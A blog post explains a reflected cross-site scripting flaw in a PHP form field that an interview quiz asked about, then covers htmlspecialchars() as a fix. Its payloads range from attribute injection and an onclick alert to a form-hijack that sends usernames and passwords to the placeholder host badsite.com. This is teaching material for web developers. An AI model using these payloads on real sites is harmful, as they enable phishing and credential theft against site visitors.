I was recently taking a small quiz in PHP as part of a job interview (by the way if anyone knows of a job opening for a telecommuting contractor, please let me know). One of the questions posed contained this piece of code which has been slightly modified for our use.
<input type="text" name="order" value="<?php echo $_POST['order']; ?>" />
Basically the question was: What is wrong with this code? I didn’t really think much of it, because it is a classic example of an XSS vulnerability. After submitting the quiz, I was given a phone interview in which I learned that no one else was able to pick out the the XSS vulnerability. To be fair to the others interviewed I do not know what their qualifications were or how much experience they have had with PHP.
Anyway, if you want to write code for the internet you need to be able to pick out these simple vulnerabilities and understand how they are exploited. It does not matter if you are just coding for your own website or getting paid, security holes effect not only the website but more importantly your visitors.
OK, so how is this code exploited? I assume the coders who do not see the vulnerability assume that even if the value contains HTML, JavaScript, or whatever it will simply be printed into the text box. For example if the value provided is:
<em>hello</em>
When the form is submitted the code will simply print:
<em>hello</em>
in the text box.
This is true, but the problem is; what happens when someone enters:
watch it grow" size="100
When this value is printed in the text box, the browser ’sees’ the quote following: watch it grow and ends the ‘value’ attribute. The browser then adds a ’size’ attribute to the input tag, whose value is 100. Basically the code interpreted by the browser looks like this:
<input type="text" name="order" value="watch it grow" size="100" />
Now we know that simply adding a ” (quote) will end the value attribute and any number of additional attributes can be added by the user. So lets make a more interactive value and add some JavaScript. In the text box we can add:
click here” onclick=”alert(‘hello’);
Now the code interpreted by the browser looks like this:
<input type="text" name="order" value="click here" onclick="alert('hello');" />
After the form is submitted the value in the text box reads: click here. When the user then clicks the text box the JavaScript will fire and an alert will appear which reads: ‘hello’.
Taking this exploit one step further, with one final example. The hack is not limited to simply adding attributes to the input tag (although in most cases this is all someone needs to do to accomplish their task). If we wanted to also add extra HTML, or a full blown JavaScript, all that needs to be done is to end the ‘value’ attribute with the ” (quote) and then add the end of the input tag: /> and presto we are out of the input tag and free to add anything; such as a new form which POSTS to a different website. Let’s add:
Fill out form completely" disabled/></form><form method="POST" action="http://badsite.com">Username: <input type="text" name="username"><br/>Password:<input type="password" name="user_pass"><br/><input type="hidden" name="end_input" value="
With this code we start with: Fill out form completely”
The ” (quote) following the word ‘completely’ will end the ‘value’ attribute.
We then place: disabled/>
This will disable the “order” input and end the tag, now we are in the realm of adding HTML.
Next by adding: </form>
We have ended the form, and are able to create something new.
As you can see we have added our own form which submits the user’s values to a different website: badsite.com. This code in essence takes control of the original submit button, because by adding the new form the submit button submits all values wherever we like.
To get a clear picture, after the form is submitted this is the code which is rendered by the browser (formatted for ease of read):
<input type="text" name="order" value="Fill out form completely" disabled/> </form> <form method="POST" action="http://badsite.com"> Username: <input type="text" name="username"/> <br /> Password: <input type="password" name="user_pass"/> <br /> <input type="hidden" value=""/>
Hopefully you now see that this is an extremely powerful exploit which needs to be addressed. Wait, I know what your thinking; with this type of exploit the only user effected is the one submitting the form in the first place. This is simply NOT true, but you will have to do the research yourself if you still don’t believe that this is a security hole (or you have ideas of cracking a few sites. 
)
So how can we possibly stop this type of attack? Actually it is really simple, PHP provides a built-in function: htmlspecialchars().
htmlspecialchars() converts special characters to HTML entities, rendering all of our examples useless. So our original piece of code would look like this:
<input type="text" name="order" value=" <?php echo htmlspecialchars($_POST['order']); ?> " />
This is only one way to ‘fix’ the problem and may not work in all situations; some other methods of preventing an XSS attack are:
- Use an exclusion approach with strip_tags().
- Use regular expressions to filter any data which may not have been caught by the built-in functions.
- Use filtration methods on all external data including: database and $_SERVER data. Basically any data which does not originate from inside the script.
I believe the best defense is a combination of a few different strategies.
XSS is a huge topic and this only scratches the surface. If you want to find more information use your favorite search engine and search the phrase: “PHP XSS exploits tutorials”. Then read until your so paranoid that you want to take down your website immediately and fix all the holes.
PDF
